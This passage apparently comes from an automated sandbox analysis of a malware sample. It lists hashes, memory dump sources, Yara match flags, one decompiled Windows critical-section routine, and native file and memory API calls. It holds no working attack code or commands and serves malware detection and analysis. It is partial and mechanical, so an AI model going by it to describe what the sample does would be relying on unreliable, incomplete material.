                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction ID: 30aadddd4de293460f152fb1f46ef87ca67f520565e0a6c02e91bc8515726113
                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                    • Instruction Fuzzy Hash: 4A21FF36204301AFD716DF28C890AAABBA5FBD4350F048669F9958F381DA30D90ACB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05195cda111974dfe577e1e4c44bd556158051485a582345c6774cd16676174c
                    • Instruction ID: 2f4a062e95008949f9ef80c14eec1a5cf2d11bdfd69459c748238c28391e0230
                    • Opcode Fuzzy Hash: 05195cda111974dfe577e1e4c44bd556158051485a582345c6774cd16676174c
                    • Instruction Fuzzy Hash: 1021AE72900644ABC725DF69D894E6BBBE8FF58351F10056EFA0AD7760E634E900CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction ID: cf989716e3c8eea0fe36cc02694a5b1b93d2ae297d0a10485524ffbc37877682
                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction Fuzzy Hash: 6A21D731601681DFEB26AB69C954F3A77E4EF54250F2904A3DD048B7B2D7B4DC42C690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction ID: ac9107523782adfe3f98b320e81cc85951cca1c6112b064157cbd8d090218653
                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction Fuzzy Hash: A3217C72A40641DBDB31CF4EC540E66BFE6EB94A10F24816FE95AC7B21D730AC06CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 27480a8a65624d70cc1085a90ac4a0070677b8d541f27d21737b5edffed5292a
                    • Instruction ID: 7c8e13cac3ad50b468e998957b3a8a9ef3bb1922f83784b8988adac648339766
                    • Opcode Fuzzy Hash: 27480a8a65624d70cc1085a90ac4a0070677b8d541f27d21737b5edffed5292a
                    • Instruction Fuzzy Hash: F01108337051109BCF29DA1A9D91A6B7697FBE5630B35412FDD16CB3A0D931AC02C694
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d54b297360235a3b1b075d61d06e1b264c707657378be219604ee92ea4b87c37
                    • Instruction ID: 0cafd76b6d71c2188f65ef73deefc7801ffdfaea7cd22ea1a39b1e6c78b78d5c
                    • Opcode Fuzzy Hash: d54b297360235a3b1b075d61d06e1b264c707657378be219604ee92ea4b87c37
                    • Instruction Fuzzy Hash: 8C0184712015467FD351BB7ACD90E5BB7ACFB65660B00022FF9188BA21CB34EC11C6E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 926b0815d186635696fe9e906f4a1e732fd532653e8af0599f885881046f7969
                    • Instruction ID: 0296059ea30bc8eb8db61b228dff4c36cf5f30d28760198b52d060ca031be7f8
                    • Opcode Fuzzy Hash: 926b0815d186635696fe9e906f4a1e732fd532653e8af0599f885881046f7969
                    • Instruction Fuzzy Hash: 65019271A00219AFCB10DFA9D881EAEBBB8EF64700F41405BF904EB290D6709A01C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 62dc74b7ff75995ff7e7a1de5fe459da09b1746c2b9c9d25f590136b54d94d19
                    • Instruction ID: 2e1eaa9653369e65cf2520d1b07992594b657e2f9593412c634ac81addaf2d8c
                    • Opcode Fuzzy Hash: 62dc74b7ff75995ff7e7a1de5fe459da09b1746c2b9c9d25f590136b54d94d19
                    • Instruction Fuzzy Hash: D3019271A00259AFCB10DFA9D841EAEBBB8EF55700F41405BF914EB290D670DA00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9408e326c4ac4924824cb0b6105d00200741e03454b530a20daf8772640cf0cd
                    • Instruction ID: e691a7d0ce437459a812fd90c73f3ba67de81db3084a167aff79980e2db035ef
                    • Opcode Fuzzy Hash: 9408e326c4ac4924824cb0b6105d00200741e03454b530a20daf8772640cf0cd
                    • Instruction Fuzzy Hash: 31012431A001059BDB10EE6AD8149AF77ACEB51174F8500AB99059F360DE30ED0AC391
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb3479d68715eb2106ec24247e9ddce572b87841a7368c25cd61309e3f74245e
                    • Instruction ID: 6a746e41cf7918aaa30cca7cf0d30587be7277843c14a39fbe9377f7fa9dda08
                    • Opcode Fuzzy Hash: eb3479d68715eb2106ec24247e9ddce572b87841a7368c25cd61309e3f74245e
                    • Instruction Fuzzy Hash: 00012872604B429FC711EF79C940B1EBBD5BBD4310F048A19F9958B690EE30D545CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction ID: 742298fa093ec385c359816a3ded3cdf914278d9351a62129fa5cfc77a449d78
                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction Fuzzy Hash: FD015EB22005849FE323875DC948FA77BD8EB96A50F1940A6AA19CB772E638DC41C660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40f300947d99b6b7ecd82fd86e23c3023abecd7ec709a9d5118ad264690a80db
                    • Instruction ID: dd38d7519c0157fa6fd88f3a0227bfdaddd24f77dd33017419362acf4f390b21
                    • Opcode Fuzzy Hash: 40f300947d99b6b7ecd82fd86e23c3023abecd7ec709a9d5118ad264690a80db
                    • Instruction Fuzzy Hash: D601D471A00209AFDB14DFA9D811FAEBBB8EF60700F01406BB900AB291DA309901C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55eff4c614e2c4d9958ded62c12b69f79a847d1b7aa2a48a0189106713abe026
                    • Instruction ID: 4b5b022e5f5a6a950cdba4d3189a7e11042417777f8aaa38a2135ba3fe17ea07
                    • Opcode Fuzzy Hash: 55eff4c614e2c4d9958ded62c12b69f79a847d1b7aa2a48a0189106713abe026
                    • Instruction Fuzzy Hash: F6018471A00219ABDB14DFA9D855FAEBBB8EF64700F41406BB910AB290DA709A05CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3abeb6f8432e089b197cb5a075ca6d1b967aa303a9a55e0c00f79a30a2925dbc
                    • Instruction ID: 8b068c8fe0ad9c61b60b7309702cd3ef55db9a5c127742a2ee195aa1db63e53d
                    • Opcode Fuzzy Hash: 3abeb6f8432e089b197cb5a075ca6d1b967aa303a9a55e0c00f79a30a2925dbc
                    • Instruction Fuzzy Hash: 1A012C71A0021DAFCB04DFA9D9519AEBBF8FF58310F55405AF905EB351D674A901CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a36002193f318ac1f8a786eeef108c60d5301d54565ed8bd0ade335421e8b5b8
                    • Instruction ID: d85337a11f871f21ee9b1a3ca9523a9bfaeb6371b5f3bddef7568cd9221adfa8
                    • Opcode Fuzzy Hash: a36002193f318ac1f8a786eeef108c60d5301d54565ed8bd0ade335421e8b5b8
                    • Instruction Fuzzy Hash: 49111E71A0025A9FDB04DFA9D551BAEBBF4FF18300F5442AAE518EB382E6349940CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction ID: b418393d09ee55a0018fdb958b1530fd5040796820b82ac86ea71ffa383119ca
                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction Fuzzy Hash: 22F0F2337015239BD3326ADA4490F17B69DCFE2D54F19003BF2455B36CC9708C0286D2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction ID: 64f44ee9aed3c55b42eb925a734870cfd54214c8b2a1b98d819ecafca7cbca65
                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction Fuzzy Hash: B5016D36300A80EBD322975EC918B6A7BD9EF51B54F0940A7EA14CB7B2D679C8018215
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be5adf3b67f64a0892898f5a829f0d5f23ab5018058ae69ba1e4a94cced7ed28
                    • Instruction ID: dc0a06bf79a5a0337e95cabf5b7ec9b57cb110f9e13168d889efa0e8f1712cad
                    • Opcode Fuzzy Hash: be5adf3b67f64a0892898f5a829f0d5f23ab5018058ae69ba1e4a94cced7ed28
                    • Instruction Fuzzy Hash: 9D016271A00209EFCB14DFA9D551A6EB7F4EF14704F50419EA914DB392D635D906CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10ef6419b8a1e6598c9490bb26ad32956660ea601ae5d2ef16063891f27912b6
                    • Instruction ID: 263c8e0104b6738ebb1c95834ee192919b2100e7e07cb69a638075765e00c103
                    • Opcode Fuzzy Hash: 10ef6419b8a1e6598c9490bb26ad32956660ea601ae5d2ef16063891f27912b6
                    • Instruction Fuzzy Hash: FD018C71A00259AFCB00EFA9D545AAEB7F4FF28300F40405AF805EB391E6309A00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5955e79d0f2b35e072df5c73d4960faa8399b3c191718548ea92726c1c59bd4d
                    • Instruction ID: 9adbbb252f4b2ea2ef7ee06f7e0b56f669892806b9167af1be9a988b3eefbf09
                    • Opcode Fuzzy Hash: 5955e79d0f2b35e072df5c73d4960faa8399b3c191718548ea92726c1c59bd4d
                    • Instruction Fuzzy Hash: 4801AF70A0020DAFCB04EFA9D545AAEB7F4FF68300F50405AB914EB390EA34DA00CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec5bc34bba3ea429b2849d93f3bbcfe2ec1a7840d57685d95261ebda0d3041ac
                    • Instruction ID: 9de054b90c0b4441584e0bad73ff673ca53f599c4d09c80f938ddd82acc5faec
                    • Opcode Fuzzy Hash: ec5bc34bba3ea429b2849d93f3bbcfe2ec1a7840d57685d95261ebda0d3041ac
                    • Instruction Fuzzy Hash: 33F0C271A00258EFCB10EFA9C445A6FB7F4FF24300F40406AE915EB391E6309900CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b53e7cb5ab5e5663aaf1b8f26a6373963abe6a2923b7b01536fc0d95f0e7d66
                    • Instruction ID: 79432e55cd92d8cfab36776fa1929145b9148dfc9779b234928e5c7a70841d19
                    • Opcode Fuzzy Hash: 5b53e7cb5ab5e5663aaf1b8f26a6373963abe6a2923b7b01536fc0d95f0e7d66
                    • Instruction Fuzzy Hash: 3EF090B29156B1DFEF36A71C8084BAB7FD49B45670F448467E50587732C7B4D880C270
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 993988f098d6c6a5dbd1dfa18110942a4b80265a29af60db7267537e5d47de6f
                    • Instruction ID: e6f7d3f95d9f92fddf92ef5fe74ce078107c4c2eb97e86e4e1750839d365e717
                    • Opcode Fuzzy Hash: 993988f098d6c6a5dbd1dfa18110942a4b80265a29af60db7267537e5d47de6f
                    • Instruction Fuzzy Hash: D8900271701000539540A6D95844A8A4115E7F0345B51D466A4004555CC6A498616171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10bd5c0226cef3676daccbe1016ee968ec989f9aec9bd3dce8d120ac090aef65
                    • Instruction ID: ab30019298105d4a3d3449579f9bb533096d7e43a94b7e78cad4421a3adc4938
                    • Opcode Fuzzy Hash: 10bd5c0226cef3676daccbe1016ee968ec989f9aec9bd3dce8d120ac090aef65
                    • Instruction Fuzzy Hash: 21900261A0500403D180719954587460025E7D0245F51D462A0014555DC7A99A5576F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88958dcf8ec8d66d6c31b6e81ddce877f726273910787721aaface0af71ba31e
                    • Instruction ID: 6e255883199cebc5a00b5e87856b6bc8ea405d51a936c59cbb59a82bab0fcb4a
                    • Opcode Fuzzy Hash: 88958dcf8ec8d66d6c31b6e81ddce877f726273910787721aaface0af71ba31e
                    • Instruction Fuzzy Hash: A890027171114403D150619984447460015E7D1245F51C862A0814559DC7E598917172
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb9557d0f40ae7e33c3497d96f3296e9d59c2efb0a040a7d4c51976b98997508
                    • Instruction ID: bad8fdde087b9e40766bd3fde3df93a49ef39481930ac4fe91499508bc25c278
                    • Opcode Fuzzy Hash: fb9557d0f40ae7e33c3497d96f3296e9d59c2efb0a040a7d4c51976b98997508
                    • Instruction Fuzzy Hash: EC90027160504843D18071994444A860025E7D0349F51C462A0054695DD7759D55B6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f218ec71850e551e11509d7ae3b3af160f09e9bf1adfb4eabcf0c34b1cfc3bf5
                    • Instruction ID: 1486a7bc70a62528884460f14a07fd603578784b7bad480adb868565d18e8f3f
                    • Opcode Fuzzy Hash: f218ec71850e551e11509d7ae3b3af160f09e9bf1adfb4eabcf0c34b1cfc3bf5
                    • Instruction Fuzzy Hash: 7A900271A0500803D190719944547860015E7D0345F51C462A0014655DC7A59A5576F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2af9cfe467b971187d0157c2f9a8ebeda5bf7fe175f7758bc5145aab0ce21145
                    • Instruction ID: f17bf47e1373a30742d99b5a04bf88cbdbcb8fc2b6b4233a47c19786d849247e
                    • Opcode Fuzzy Hash: 2af9cfe467b971187d0157c2f9a8ebeda5bf7fe175f7758bc5145aab0ce21145
                    • Instruction Fuzzy Hash: A690027160100843D14061994444B860015E7E0345F51C467A0114655DC765D8517571
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction ID: 21946fd80ecee1cafc0fff945da5a70dc6128ed7c3ccf4d240187af48a0eac2c
                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E014FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E014ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E014F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E014F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014FFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014FFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014FFE01
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 056674a54286cf0bb6b8720cc0f27992469020168de3cff6c43fa7d4082e209e
                    • Instruction ID: 6f38a4e33d4b8ca435c77f2c035d21085456e199ad9248e41c264b461aa2ba87
                    • Opcode Fuzzy Hash: 056674a54286cf0bb6b8720cc0f27992469020168de3cff6c43fa7d4082e209e
                    • Instruction Fuzzy Hash: 52F0C832540101BBE7201A46DC01E237F5ADB54730F24021EF724556F1D972B82086A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    APIs
                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00714BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00714BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0071A3AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID: .z`
                    • API String ID: 823142352-1441809116
                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction ID: 563851f3ce8e03a38bc7586c1d02f8da15045e2669d38431aa18680db76dfc61
                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                    • Instruction Fuzzy Hash: 85F0BDB2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jq,FFFFFFFF,?,rMq,?,00000000), ref: 0071A455
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jq
                    • API String ID: 2738559852-4152144016
                    • Opcode ID: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                    • Instruction ID: 9c2ea8929cb964f911ae0300bfee50700c062439d59a2cb3e6f64fe399394eb0
                    • Opcode Fuzzy Hash: 3b64409855d51beab7a2484172b630d8b035c7d66292ae0b4cfa7e96f7101326
                    • Instruction Fuzzy Hash: 8FF0F4B2200108ABCB14DF88DC80EEB77ADEF8C754F158648BE0DA7241C630ED51CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1Jq,FFFFFFFF,?,rMq,?,00000000), ref: 0071A455
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1Jq
                    • API String ID: 2738559852-4152144016
                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction ID: 566e72f981a2e999b450a0f5b0a81a0277e3e6e91364a258fbfd70aade502a11
                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                    • Instruction Fuzzy Hash: 59F0A4B2200208ABCB14DF89DC85EEB77ADEF8C754F158248BA1D97241D630E8518BA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(PMq,?,?,00714D50,00000000,FFFFFFFF), ref: 0071A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: PMq
                    • API String ID: 3535843008-4045965120
                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction ID: e8d67d489e0b4a1984a1af9200878e53034621a65f9458c72731ed98ce2b702e
                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                    • Instruction Fuzzy Hash: D3D01275200214BBD710EB98CC45ED7776CEF44760F154455BA1C5B242C530F50086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                    • Instruction ID: e83e1e22cfbd22110d7e6fdbee22006cb03012ba97fc6a1e68213fac0a757cdc
                    • Opcode Fuzzy Hash: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                    • Instruction Fuzzy Hash: A3F0F2B6210208ABDB18DF89CC81EEB77ADEF88754F118149FA1897241C631E912CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 9be94932b48655d3567ca32908a0634e4d50c83274fb37f1215147392d8ac2be
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 12F015B2200208ABCB14DF89CC81EEB77ADEF88754F118148BE0897241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                    • Instruction ID: 0b592ebaa32ecd996efdb12b340020ae97f2b2b4f35bc77e1b3316eaea11facc
                    • Opcode Fuzzy Hash: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                    • Instruction Fuzzy Hash: 72900261242141537546F15984045074056E7E02857A1C122A5405951C8566E896E761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
